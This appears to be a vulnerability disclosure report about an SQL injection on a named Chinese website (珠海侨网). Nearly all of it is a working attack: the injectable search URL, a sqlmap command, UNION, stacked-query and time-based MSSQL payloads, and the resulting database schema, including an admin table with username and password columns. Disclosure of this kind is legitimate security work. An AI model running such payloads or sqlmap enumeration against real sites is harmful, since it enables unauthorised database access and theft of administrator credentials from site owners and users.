SQL injection exists at one location on 珠海侨网

**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27

[email protected]:/usr/share/w3af/w3af/plugins/attack/db/sqlmap# python sqlmap.py -u "**.**.**.**/searchshow.aspx?key=test%%27%20and%20%27%%27=%27" -t T_Admin --columns

         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20160413}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   https://**.**.**.**

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:22:39

T_Admin
[22:22:39] [INFO] setting file for logging HTTP traffic
[22:22:39] [WARNING] it appears that you have provided tainted parameter values ('key=test%' and '%'='') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[22:22:41] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:22:41] [INFO] testing connection to the target URL
[22:22:41] [WARNING] reflective value(s) found and filtering out
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: key (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: key=test%' and '%'='' UNION ALL SELECT 19,CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(115)+CHAR(98)+CHAR(81)+CHAR(74)+CHAR(89)+CHAR(83)+CHAR(117)+CHAR(118)+CHAR(104)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113),19,19,19,19--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: key=test%' and '%'=''; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: key=test%' and '%'='' WAITFOR DELAY '0:0:5'--
---
[22:22:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:22:41] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[22:22:41] [INFO] fetching current database
[22:22:41] [INFO] fetching tables for database: zhqw
[22:22:41] [INFO] the SQL query used returns 32 entries
[22:22:41] [INFO] fetching columns for table 'Choice' in database 'zhqw'
[22:22:41] [INFO] the SQL query used returns 5 entries
[22:22:41] [INFO] resumed: "choice","nvarchar"
[22:22:41] [INFO] resumed: "extends","int"
[22:22:41] [INFO] resumed: "id","int"
[22:22:41] [INFO] resumed: "IsDefault","int"
[22:22:41] [INFO] resumed: "num","int"
[22:22:41] [INFO] fetching columns for table 'Reply' in database 'zhqw'
[22:22:42] [INFO] the SQL query used returns 4 entries
[22:22:42] [INFO] retrieved: "contant","nvarchar"
[22:22:42] [INFO] retrieved: "id","int"
[22:22:43] [INFO] retrieved: "replytime","datetime"
[22:22:43] [INFO] retrieved: "tid","int"
[22:22:43] [INFO] fetching columns for table 'T_Admin' in database 'zhqw'
[22:22:44] [INFO] the SQL query used returns 11 entries
[22:22:45] [INFO] retrieved: "addtime","datetime"
[22:22:45] [INFO] retrieved: "AdminWrite","ntext"
[22:22:45] [INFO] retrieved: "bumenid","int"
[22:22:46] [INFO] retrieved: "czname","nvarchar"
[22:22:46] [INFO] retrieved: "jueseid","nvarchar"
[22:22:46] [INFO] retrieved: "phone","nvarchar"
[22:22:47] [INFO] retrieved: "roleid","int"
[22:22:47] [INFO] retrieved: "uid","int"
[22:22:47] [INFO] retrieved: "userid","nvarchar"
[22:22:48] [INFO] retrieved: "username","nvarchar"
[22:22:48] [INFO] retrieved: "userpwd","nvarchar"
[22:22:48] [INFO] fetching columns for table 'Title' in database 'zhqw'
[22:22:49] [INFO] the SQL query used returns 6 entries
[22:22:49] [INFO] retrieved: "choice","smallint"
[22:22:49] [INFO] retrieved: "current","bit"
[22:22:50] [INFO] retrieved: "id","int"
[22:22:50] [INFO] retrieved: "title","nvarchar"
[22:22:50] [INFO] retrieved: "typeid","int"
[22:22:51] [INFO] retrieved: "windows","bit"
[22:22:51] [INFO] fetching columns for table 'aboutInfo' in database 'zhqw'
[22:22:51] [INFO] the SQL query used returns 4 entries
[22:22:52] [INFO] retrieved: "aid","int"
[22:22:52] [INFO] retrieved: "neirong","nvarchar"
[22:22:52] [INFO] retrieved: "stypeid","int"
[22:22:53] [INFO] retrieved: "typeid","int"
[22:22:53] [INFO] fetching columns for table 'adInfo' in database 'zhqw'
[22:22:53] [INFO] the SQL query used returns 6 entries
[22:22:53] [INFO] retrieved: "aid","int"
[22:22:54] [INFO] retrieved: "ispass","int"
[22:22:54] [INFO] retrieved: "link","nvarchar"
[22:22:55] [INFO] retrieved: "name","nvarchar"
[22:22:55] [INFO] retrieved: "pic","nvarchar"
[22:22:55] [INFO] retrieved: "typeid","int"
[22:22:56] [INFO] fetching columns for table 'bumenInfo' in database 'zhqw'
[22:22:56] [INFO] the SQL query used returns 3 entries
[22:22:56] [INFO] retrieved: "beizhu","nvarchar"
[22:22:57] [INFO] retrieved: "bid","int"
[22:22:57] [INFO] retrieved: "name","nvarchar"
[22:22:57] [INFO] fetching columns for table 'classType' in database 'zhqw'
[22:22:57] [INFO] the SQL query used returns 6 entries
[22:22:58] [INFO] retrieved: "cid","int"
[22:22:58] [INFO] retrieved: "classname","nvarchar"
[22:22:58] [INFO] retrieved: "htlink","nvarchar"
[22:22:59] [INFO] retrieved: "lowerid","int"
[22:22:59] [INFO] retrieved: "pxid","int"
[22:23:00] [INFO] retrieved: "qtlink","nvarchar"
[22:23:00] [INFO] fetching columns for table 'config' in database 'zhqw'
[22:23:00] [INFO] the SQL query used returns 12 entries
[22:23:00] [INFO] retrieved: "ckid","int"
[22:23:01] [INFO] retrieved: "count","int"
[22:23:01] [INFO] retrieved: "webAddress","nvarchar"
[22:23:01] [INFO] retrieved: "webemail","nvarchar"
[22:23:02] [INFO] retrieved: "webFax","nvarchar"
[22:23:02] [INFO] retrieved: "webhomepage","nvarchar"
[22:23:02] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webKeycontent","nvarchar"
[22:23:03] [INFO] retrieved: "webname","nvarchar"
[22:23:03] [INFO] retrieved: "webTel","nvarchar"
[22:23:04] [INFO] retrieved: "webyoubian","nvarchar"
[22:23:04] [INFO] retrieved: "wid","int"
[22:23:04] [INFO] fetching columns for table 'dingyueInfo' in database 'zhqw'
[22:23:04] [INFO] the SQL query used returns 8 entries
[22:23:05] [INFO] retrieved: "addtime","datetime"
[22:23:05] [INFO] retrieved: "did","int"
[22:23:06] [INFO] retrieved: "laiyuan","nvarchar"
[22:23:06] [INFO] retrieved: "neirong","nvarchar"
[22:23:06] [INFO] retrieved: "pic","nvarchar"
[22:23:07] [INFO] retrieved: "title","nvarchar"
[22:23:07] [INFO] retrieved: "typeid","int"
[22:23:08] [INFO] retrieved: "userid","nvarchar"
[22:23:08] [INFO] fetched tables' columns on database 'zhqw'
Database: zhqw
Table: config
[11 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ckid          | int      |
| count         | int      |
| webAddress    | nvarchar |
| webemail      | nvarchar |
| webFax        | nvarchar |
| webhomepage   | nvarchar |
| webKeycontent | nvarchar |
| webname       | nvarchar |
| webTel        | nvarchar |
| webyoubian    | nvarchar |
| wid           | int      |
+---------------+----------+

Database: zhqw
Table: bumenInfo
[3 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| beizhu | nvarchar |
| bid    | int      |
| name   | nvarchar |
+--------+----------+

Database: zhqw
Table: T_Admin
[11 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| addtime    | datetime |
| AdminWrite | ntext    |
| bumenid    | int      |
| czname     | nvarchar |
| jueseid    | nvarchar |
| phone      | nvarchar |
| roleid     | int      |
| uid        | int      |
| userid     | nvarchar |
| username   | nvarchar |
| userpwd    | nvarchar |
+------------+----------+

Database: zhqw
Table: dingyueInfo
[8 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| addtime | datetime |
| did     | int      |
| laiyuan | nvarchar |
| neirong | nvarchar |
| pic     | nvarchar |
| title   | nvarchar |
| typeid  | int      |
| userid  | nvarchar |
+---------+----------+

Database: zhqw
Table: adInfo
[6 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| aid    | int      |
| ispass | int      |
| link   | nvarchar |
| name   | nvarchar |
| pic    | nvarchar |
| typeid | int      |
+--------+----------+

Database: zhqw
Table: aboutInfo
[4 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| aid     | int      |
| neirong | nvarchar |
| stypeid | int      |
| typeid  | int      |
+---------+----------+

Database: zhqw
Table: classType
[6 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| cid       | int      |
| classname | nvarchar |
| htlink    | nvarchar |
| lowerid   | int      |
| pxid      | int      |
| qtlink    | nvarchar |
+-----------+----------+

Database: zhqw
Table: Title
[6 columns]
+---------+----------+
| Column  | Type     |
+---------+----------+
| choice  | smallint |
| current | bit      |
| id      | int      |
| title   | nvarchar |
| typeid  | int      |
| windows | bit      |
+---------+----------+

Database: zhqw
Table: Choice
[5 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| choice    | nvarchar |
| extends   | int      |
| id        | int      |
| IsDefault | int      |
| num       | int      |
+-----------+----------+

Database: zhqw
Table: Reply
[4 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| contant   | nvarchar |
| id        | int      |
| replytime | datetime |
| tid       | int      |
+-----------+----------+

[22:23:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'

[*] shutting down at 22:23:08